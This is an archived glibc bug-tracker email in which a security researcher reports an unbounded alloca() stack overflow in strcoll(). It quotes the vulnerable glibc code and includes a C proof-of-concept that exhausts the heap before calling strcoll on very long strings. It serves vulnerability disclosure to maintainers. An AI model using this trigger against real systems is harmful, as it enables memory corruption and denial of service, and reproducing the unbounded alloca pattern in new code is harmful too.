From mboxrd@z Thu Jan 1 00:00:00 1970 Return-Path: Received: (qmail 12640 invoked by alias); 11 Sep 2012 09:53:59 -0000 Received: (qmail 12630 invoked by uid 22791); 11 Sep 2012 09:53:58 -0000 X-SWARE-Spam-Status: No, hits=-3.8 required=5.0 tests=ALL_TRUSTED,AWL,BAYES_00,KHOP_THREADED X-Spam-Check-By: sourceware.org Received: from localhost (HELO sourceware.org) (127.0.0.1) by sourceware.org (qpsmtpd/0.43rc1) with ESMTP; Tue, 11 Sep 2012 09:53:47 +0000 From: "shaun.colley at ioactive dot com" To: glibc-bugs@sources.redhat.com Subject: [Bug libc/14547] strcoll integer / buffer overflow Date: Tue, 11 Sep 2012 09:53:00 -0000 X-Bugzilla-Reason: CC X-Bugzilla-Type: changed X-Bugzilla-Watch-Reason: None X-Bugzilla-Product: glibc X-Bugzilla-Component: libc X-Bugzilla-Keywords: X-Bugzilla-Severity: normal X-Bugzilla-Who: shaun.colley at ioactive dot com X-Bugzilla-Status: NEW X-Bugzilla-Priority: P2 X-Bugzilla-Assigned-To: unassigned at sourceware dot org X-Bugzilla-Target-Milestone: --- X-Bugzilla-Changed-Fields: Message-ID: In-Reply-To: References: X-Bugzilla-URL: http://sourceware.org/bugzilla/ Auto-Submitted: auto-generated Content-Type: text/plain; charset="UTF-8" MIME-Version: 1.0 Mailing-List: contact glibc-bugs-help@sourceware.org; run by ezmlm Precedence: bulk List-Id: List-Subscribe: List-Post: List-Help: , Sender: glibc-bugs-owner@sourceware.org X-SW-Source: 2012-09/txt/msg00090.txt.bz2 http://sourceware.org/bugzilla/show_bug.cgi?id=14547 --- Comment #4 from Shaun Colley 2012-09-11 09:53:33 UTC --- I've detailed another strcoll() security vulnerability below, which is an unbounded alloca() call. alloca() stack overflow If the malloc() call in alloca() fails (i.e. OOM conditions), strcoll() will failsafe to alloca() for allocating its memory, which could result in unbounded alloca() calls and exploitable conditions if the stack pointer is shifted over the guard area and into the heap. See vulnerable code below. if (idx1arr == NULL) /* No memory. Well, go with the stack then. XXX Once this implementation is stable we will handle this differently. Instead of precomputing the indeces we will do this in time. This means, though, that this happens for every pass again. */ goto try_stack; use_malloc = 1; } else { try_stack: idx1arr = (int32_t *) alloca (s1len * sizeof (int32_t)); idx2arr = (int32_t *) alloca (s2len * sizeof (int32_t)); rule1arr = (unsigned char *) alloca (s1len); rule2arr = (unsigned char *) alloca (s2len); [ ... ] Here's my testcase / proof-of-concept for the issue. #include #include #include #include #define LEN 500000 int main() { char *ptr1 = malloc(LEN + 1); char *ptr2 = malloc(LEN + 1); char *wasted = NULL; int i = 0, ret = 0; if(!ptr1 || !ptr2) { printf("memory allocation failed\n"); return -1; } memset(ptr1, 0x61, LEN); memset(ptr2, 0x61, LEN); ptr1[LEN] = 0; ptr2[LEN] = 0; printf("strings allocated\n"); char *ptr = setlocale(LC_ALL, "en_US.UTF-8"); if(!ptr) { printf("error setting locale\n"); return -1; } /* malloc() big chunks until we're out of memory */ do { wasted = malloc(1000000); printf("%p\n", wasted); i++; } while(wasted); ret = strcoll(ptr1, ptr2); if(!ret) { printf("strings were lexicographically identical\n"); } else { printf("strings were different\n"); } return 0; } Cheers, Shaun -- Configure bugmail: http://sourceware.org/bugzilla/userprefs.cgi?tab=email ------- You are receiving this mail because: ------- You are on the CC list for the bug.